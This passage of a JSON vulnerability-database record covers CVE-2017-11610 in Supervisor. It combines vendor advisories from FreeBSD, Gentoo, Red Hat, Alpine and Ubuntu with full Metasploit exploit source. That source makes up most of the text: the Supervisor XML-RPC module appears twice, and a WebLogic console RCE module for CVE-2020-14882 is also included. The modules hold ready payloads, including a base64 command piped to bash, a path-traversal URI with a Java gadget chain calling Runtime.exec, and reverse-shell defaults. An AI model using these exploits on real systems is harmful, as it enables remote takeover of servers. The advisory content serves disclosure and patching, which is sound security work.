"href": "https://advisories.mageia.org/MGASA-2017-0263.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2023-09-28T08:56:18", "description": "\n\nmnaberez reports:\n\nsupervisord can be configured to run an HTTP server on a TCP socket and/or a Unix domain socket.\n\t The HTTP server is how supervisorctl communicates with supervisord. If an HTTP server has been\n\t enabled, it will always serve both HTML pages and an XML-RPC interface. A vulnerability has been\n\t found where an authenticated client can send a malicious XML-RPC request to supervisord that\n\t will run arbitrary shell commands on the server. The commands will be run as the same user as\n\t supervisord. Depending on how supervisord has been configured, this may be root.\nThis vulnerability can only be exploited by an authenticated client or if supervisord has been\n\t configured to run an HTTP server without authentication. If authentication has not been enabled,\n\t supervisord will log a message at the critical level every time it starts.\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-07-24T00:00:00", "type": "freebsd", "title": "Supervisord -- An authenticated client can run arbitrary shell commands via malicious XML-RPC requests", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2017-07-24T00:00:00", "id": "C9460380-81E3-11E7-93AF-005056925DB4", "href": "https://vuxml.freebsd.org/freebsd/c9460380-81e3-11e7-93af-005056925db4.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2023-09-28T09:23:26", "description": "### Background\n\nSupervisor is a client/server system that allows its users to monitor and control a number of processes on UNIX-like operating systems. \n\n### Description\n\nA vulnerability in Supervisor was discovered in which an authenticated client could send malicious XML-RPC requests and supervidord will run them as shell commands with process privileges. In some cases, supervisord is configured with root permissions. \n\n### Impact\n\nA remote attacker could execute arbitrary code with the privileges of the process. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Supervisor users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \"=app-admin/supervisor-3.1.4\"", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-09-17T00:00:00", "type": "gentoo", "title": "Supervisor: command injection vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2017-09-17T00:00:00", "id": "GLSA-201709-06", "href": "https://security.gentoo.org/glsa/201709-06", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "redhatcve": [{"lastseen": "2021-11-09T01:47:55", "description": "A vulnerability was found in the XML-RPC interface in supervisord. When processing malformed commands, an attacker can cause arbitrary shell commands to be executed on the server as the same user as supervisord. Exploitation requires the attacker to first be authenticated to the supervisord service.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-28T07:19:44", "type": "redhatcve", "title": "CVE-2017-11610", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2021-11-08T23:50:07", "id": "RH:CVE-2017-11610", "href": "https://access.redhat.com/security/cve/cve-2017-11610", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "alpinelinux": [{"lastseen": "2023-09-28T09:29:07", "description": "None", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-08-23T14:29:00", "type": "alpinelinux", "title": "CVE-2017-11610", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2019-10-03T00:03:00", "id": "ALPINE:CVE-2017-11610", "href": "https://security.alpinelinux.org/vuln/CVE-2017-11610", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-09T17:42:25", "description": "This Metasploit module exploits a vulnerability in the Supervisor process control software, where an authenticated client can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server. The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this may be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been configured to run an HTTP server without authentication. This vulnerability affects versions 3.0a1 to 3.3.2.", "cvss3": {}, "published": "2017-09-25T00:00:00", "type": "zdt", "title": "Supervisor XML-RPC Authenticated Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11610"], "modified": "2017-09-25T00:00:00", "id": "1337DAY-ID-28624", "href": "https://0day.today/exploit/description/28624", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Supervisor XML-RPC Authenticated Remote Code Execution\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the Supervisor process control software, where an authenticated client\r\n can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server.\r\n The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this\r\n may be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been\r\n configured to run an HTTP server without authentication. This vulnerability affects versions 3.0a1 to 3.3.2.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Calum Hutton <[email\u00a0protected]>'\r\n ],\r\n 'References' =>\r\n [\r\n ['URL', 'https://github.com/Supervisor/supervisor/issues/964'],\r\n ['URL', 'https://www.debian.org/security/2017/dsa-3942'],\r\n ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11610'],\r\n ['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'],\r\n ['CVE', '2017-11610']\r\n ],\r\n 'Platform' => 'linux',\r\n 'Targets' =>\r\n [\r\n ['3.0a1-3.3.2', {}]\r\n ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'DefaultOptions' =>\r\n {\r\n 'RPORT' => 9001,\r\n 'Payload' => 'linux/x64/meterpreter/reverse_tcp',\r\n },\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Jul 19 2017',\r\n 'DefaultTarget' => 0\r\n ))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(9001),\r\n OptString.new('HttpUsername', [false, 'Username for HTTP basic auth']),\r\n OptString.new('HttpPassword', [false, 'Password for HTTP basic auth']),\r\n OptString.new('TARGETURI', [true, 'The path to the XML-RPC endpoint', '/RPC2']),\r\n ]\r\n )\r\n end\r\n\r\n def check_version(version)\r\n if version <= Gem::Version.new('3.3.2') and version >= Gem::Version.new('3.0a1')\r\n return true\r\n else\r\n return false\r\n end\r\n end\r\n\r\n def check\r\n\r\n print_status('Extracting version from web interface..')\r\n\r\n params = {\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri('/')\r\n }\r\n if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty?\r\n print_status(\"Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})\")\r\n params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])})\r\n end\r\n res = send_request_cgi(params)\r\n\r\n if res\r\n if res.code == 200\r\n match = res.body.match(/<span>(\\d+\\.[\\dab]\\.\\d+)<\\/span>/)\r\n if match\r\n version = Gem::Version.new(match[1])\r\n if check_version(version)\r\n print_good(\"Vulnerable version found: #{version}\")\r\n return Exploit::CheckCode::Appears\r\n else\r\n print_bad(\"Version #{version} is not vulnerable\")\r\n return Exploit::CheckCode::Safe\r\n end\r\n else\r\n print_bad('Could not extract version number from web interface')\r\n return Exploit::CheckCode::Unknown\r\n end\r\n elsif res.code == 401\r\n print_bad(\"Authentication failed: #{res.code} response\")\r\n return Exploit::CheckCode::Safe\r\n else\r\n print_bad(\"Unexpected HTTP code: #{res.code} response\")\r\n return Exploit::CheckCode::Unknown\r\n end\r\n else\r\n print_bad('Error connecting to web interface')\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n\r\n # XML-RPC payload template, use nohup and & to detach and background the process so it doesnt hangup the web server\r\n # Credit to the following urls for the os.system() payload\r\n # https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610\r\n # https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html\r\n xml_payload = %{<?xml version=\"1.0\"?>\r\n<methodCall>\r\n <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>\r\n <params>\r\n <param>\r\n <string>echo -n #{Rex::Text.encode_base64(cmd)}|base64 -d|nohup bash > /dev/null 2>&amp;1 &amp;</string>\r\n </param>\r\n </params>\r\n</methodCall>}\r\n\r\n # Send the XML-RPC payload via POST to the specified endpoint\r\n endpoint_path = target_uri.path\r\n print_status(\"Sending XML-RPC payload via POST to #{peer}#{datastore['TARGETURI']}\")\r\n\r\n params = {\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(endpoint_path),\r\n 'ctype' => 'text/xml',\r\n 'headers' => {'Accept' => 'text/xml'},\r\n 'data' => xml_payload,\r\n 'encode_params' => false\r\n }\r\n if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty?\r\n print_status(\"Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})\")\r\n params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])})\r\n end\r\n return send_request_cgi(params, timeout=5)\r\n\r\n end\r\n\r\n def exploit\r\n\r\n res = execute_cmdstager(:linemax => 800)\r\n\r\n if res\r\n if res.code == 401\r\n fail_with(Failure::NoAccess, \"Authentication failed: #{res.code} response\")\r\n elsif res.code == 404\r\n fail_with(Failure::NotFound, \"Invalid XML-RPC endpoint: #{res.code} response\")\r\n else\r\n fail_with(Failure::UnexpectedReply, \"Unexpected HTTP code: #{res.code} response\")\r\n end\r\n else\r\n print_good('Request returned without status code, usually indicates success. Passing to handler..')\r\n handler\r\n end\r\n\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-09] #", "sourceHref": "https://0day.today/exploit/28624", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-06-06T16:39:49", "description": "This Metasploit module exploits a path traversal and a Java class instantiation in the handle implementation of WebLogic's Administration Console to execute code as the WebLogic user. Versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0 are known to be affected. Tested against 12.2.1.3.0 from Vulhub (Linux) and on Windows. Warning! Multiple sessions may be created by exploiting this vuln.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-19T00:00:00", "type": "zdt", "title": "Oracle WebLogic Server Administration Console Handle Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-14883"], "modified": "2020-11-19T00:00:00", "id": "1337DAY-ID-35287", "href": "https://0day.today/exploit/description/35287", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Oracle WebLogic Server Administration Console Handle RCE',\n 'Description' => %q{\n This module exploits a path traversal and a Java class instantiation\n in the handle implementation of WebLogic's Administration Console to\n execute code as the WebLogic user.\n\n Versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, and\n 14.1.1.0.0 are known to be affected.\n\n Tested against 12.2.1.3.0 from Vulhub (Linux) and on Windows.\n\n Warning! Multiple sessions may be created by exploiting this vuln.\n },\n 'Author' => [\n 'voidfyoo', # Discovery\n 'Jang', # Analysis and PoC\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-14882'], # Auth bypass?\n ['CVE', '2020-14883'], # RCE?\n ['CVE', '2020-14750'], # Patch bypass\n ['EDB', '48971'], # An exploit\n ['URL', 'https://www.oracle.com/security-alerts/cpuoct2020.html'],\n ['URL', 'https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf']\n ],\n 'DisclosureDate' => '2020-10-20', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux', 'win'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :curl,\n 'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'\n }\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_CMD,\n 'Type' => :win_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :win_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,\n 'PAYLOAD' => 'windows/x64/meterpreter_reverse_https'\n }\n }\n ],\n [\n 'PowerShell Stager',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh_stager,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'\n }\n }\n ]\n ],\n 'DefaultTarget' => 4,\n 'DefaultOptions' => {\n 'WfsDelay' => 10\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(7001),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = execute_command('')\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n if res.code == 200 && res.body.include?('Deploying Application')\n raise RuntimeError\n end\n\n unless res.code == 302 && res.body.include?('UnexpectedExceptionPage')\n return CheckCode::Safe('Path traversal failed.')\n end\n\n CheckCode::Vulnerable('Path traversal successful.')\n rescue RuntimeError\n vprint_error('Application is deploying, sleeping and retrying check')\n\n sleep(1)\n retry\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd, :win_cmd\n execute_command(payload.encoded)\n when :linux_dropper, :win_dropper\n execute_cmdstager\n when :psh_stager\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\") unless cmd.empty?\n\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => aperture_science_handheld_portal_device,\n 'vars_post' => {\n 'handle' => coherence_gadget_chain(cmd)\n }\n )\n end\n\n def coherence_gadget_chain(cmd)\n <<~JAVA.tr(\"\\n\", '').gsub(' ', '')\n com.tangosol.coherence.mvel2.sh.ShellSession('\n java.lang.Runtime.getRuntime().exec(\n new java.lang.String[] {\n #{win_target? ? '\"cmd.exe\", \"/c\", ' : '\"/bin/sh\", \"-c\", '}\n new java.lang.String(\n java.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\")\n )\n }\n )\n ')\n JAVA\n end\n\n def aperture_science_handheld_portal_device\n normalize_uri(target_uri.path, '/console/css/.%252e/console.portal')\n end\n\n def win_target?\n target.platform.names.first == 'Windows'\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/35287", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2023-09-29T20:46:01", "description": "The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x\nbefore 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to\nexecute arbitrary commands via a crafted XML-RPC request, related to nested\nsupervisord namespace lookups.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=870187>\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-08-23T00:00:00", "type": "ubuntucve", "title": "CVE-2017-11610", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2017-08-23T00:00:00", "id": "UB:CVE-2017-11610", "href": "https://ubuntu.com/security/CVE-2017-11610", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-01-02T11:59:52", "description": "This module exploits a vulnerability in the Supervisor process control software, where an authenticated client can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server. The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this may be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been configured to run an HTTP server without authentication. This vulnerability affects versions 3.0a1 to 3.3.2.\n", "cvss3": {}, "published": "2017-08-30T02:10:46", "type": "metasploit", "title": "Supervisor XML-RPC Authenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11610"], "modified": "2022-04-19T20:42:23", "id": "MSF:EXPLOIT-LINUX-HTTP-SUPERVISOR_XMLRPC_EXEC-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/supervisor_xmlrpc_exec/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Supervisor XML-RPC Authenticated Remote Code Execution\",\n 'Description' => %q{\n This module exploits a vulnerability in the Supervisor process control software, where an authenticated client\n can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server.\n The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this\n may be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been\n configured to run an HTTP server without authentication. This vulnerability affects versions 3.0a1 to 3.3.2.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Calum Hutton <c.e.hutton@gmx.com>'\n ],\n 'References' =>\n [\n ['URL', 'https://github.com/Supervisor/supervisor/issues/964'],\n ['URL', 'https://www.debian.org/security/2017/dsa-3942'],\n ['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'],\n ['CVE', '2017-11610']\n ],\n 'Platform' => 'linux',\n 'Targets' =>\n [\n ['3.0a1-3.3.2', {}]\n ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'DefaultOptions' =>\n {\n 'RPORT' => 9001,\n 'Payload' => 'linux/x64/meterpreter/reverse_tcp',\n },\n 'Privileged' => false,\n 'DisclosureDate' => '2017-07-19',\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n Opt::RPORT(9001),\n OptString.new('HttpUsername', [false, 'Username for HTTP basic auth']),\n OptString.new('HttpPassword', [false, 'Password for HTTP basic auth']),\n OptString.new('TARGETURI', [true, 'The path to the XML-RPC endpoint', '/RPC2']),\n ]\n )\n end\n\n def post_auth?\n true\n end\n\n def check_version(version)\n if version <= Rex::Version.new('3.3.2') and version >= Rex::Version.new('3.0a1')\n return true\n else\n return false\n end\n end\n\n def check\n\n print_status('Extracting version from web interface..')\n\n params = {\n 'method' => 'GET',\n 'uri' => normalize_uri('/')\n }\n if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty?\n print_status(\"Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})\")\n params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])})\n end\n res = send_request_cgi(params)\n\n if res\n if res.code == 200\n match = res.body.match(/<span>(\\d+\\.[\\dab]\\.\\d+)<\\/span>/)\n if match\n version = Rex::Version.new(match[1])\n if check_version(version)\n print_good(\"Vulnerable version found: #{version}\")\n return Exploit::CheckCode::Appears\n else\n print_bad(\"Version #{version} is not vulnerable\")\n return Exploit::CheckCode::Safe\n end\n else\n print_bad('Could not extract version number from web interface')\n return Exploit::CheckCode::Unknown\n end\n elsif res.code == 401\n print_bad(\"Authentication failed: #{res.code} response\")\n return Exploit::CheckCode::Safe\n else\n print_bad(\"Unexpected HTTP code: #{res.code} response\")\n return Exploit::CheckCode::Unknown\n end\n else\n print_bad('Error connecting to web interface')\n return Exploit::CheckCode::Unknown\n end\n\n end\n\n def execute_command(cmd, opts = {})\n\n # XML-RPC payload template, use nohup and & to detach and background the process so it doesnt hangup the web server\n # Credit to the following urls for the os.system() payload\n # https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610\n # https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html\n xml_payload = %{<?xml version=\"1.0\"?>\n<methodCall>\n <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>\n <params>\n <param>\n <string>echo -n #{Rex::Text.encode_base64(cmd)}|base64 -d|nohup bash > /dev/null 2>&1 &</string>\n </param>\n </params>\n</methodCall>}\n\n # Send the XML-RPC payload via POST to the specified endpoint\n endpoint_path = target_uri.path\n print_status(\"Sending XML-RPC payload via POST to #{peer}#{datastore['TARGETURI']}\")\n\n params = {\n 'method' => 'POST',\n 'uri' => normalize_uri(endpoint_path),\n 'ctype' => 'text/xml',\n 'headers' => {'Accept' => 'text/xml'},\n 'data' => xml_payload,\n 'encode_params' => false\n }\n if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty?\n print_status(\"Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})\")\n params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])})\n end\n return send_request_cgi(params, timeout=5)\n\n end\n\n def exploit\n\n res = execute_cmdstager(:linemax => 800)\n\n if res\n if res.code == 401\n fail_with(Failure::NoAccess, \"Authentication failed: #{res.code} response\")\n elsif res.code == 404\n fail_with(Failure::NotFound, \"Invalid XML-RPC endpoint: #{res.code} response\")\n else\n fail_with(Failure::UnexpectedReply, \"Unexpected HTTP code: #{res.code} response\")\n end\n else\n print_good('Request returned without status code, usually indicates success. Passing to handler..')\n handler\n end\n\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/supervisor_xmlrpc_exec.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-19T00:42:23", "description": "This module exploits a path traversal and a Java class instantiation in the handle implementation of WebLogic's Administration Console to execute code as the WebLogic user. Versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0 are known to be affected. Tested against 12.2.1.3.0 from Vulhub (Linux) and on Windows. Warning! Multiple sessions may be created by exploiting this vuln.\n", "cvss3": {}, "published": "2020-11-18T16:56:02", "type": "metasploit", "title": "Oracle WebLogic Server Administration Console Handle RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-14882"], "modified": "2021-07-08T06:19:21", "id": "MSF:EXPLOIT-MULTI-HTTP-WEBLOGIC_ADMIN_HANDLE_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/weblogic_admin_handle_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < 